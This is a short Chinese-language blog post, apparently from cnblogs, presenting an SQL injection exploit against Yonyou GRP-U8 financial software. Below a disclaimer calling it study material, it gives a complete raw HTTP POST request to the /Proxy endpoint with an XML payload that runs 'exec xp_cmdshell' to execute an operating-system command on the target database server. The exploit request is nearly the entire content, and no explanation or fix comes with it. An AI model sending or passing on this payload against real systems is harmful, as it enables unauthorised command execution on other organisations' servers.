用友GRP-u8 SQL注入

请遵守网络安全法！！！本文仅供学习交流使用！用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关！读者自行承担其恶果！

EXP

POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: x.x.x.x
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

Example

查看全文

相关阅读:
MySQL——索引
 MySQL——逻辑分层与存储引擎
 APP测试总结
 如何提高测试的质量
 测试用例的基础
 opencv图像处理常用操作一
 【bug】【Cannot find reference 'imread' in '__init__.py | __init__.py'】
Numpy学习笔记
 工业互联网
 Python基本的数据清洗

原文地址：https://www.cnblogs.com/Yang34/p/13653960.html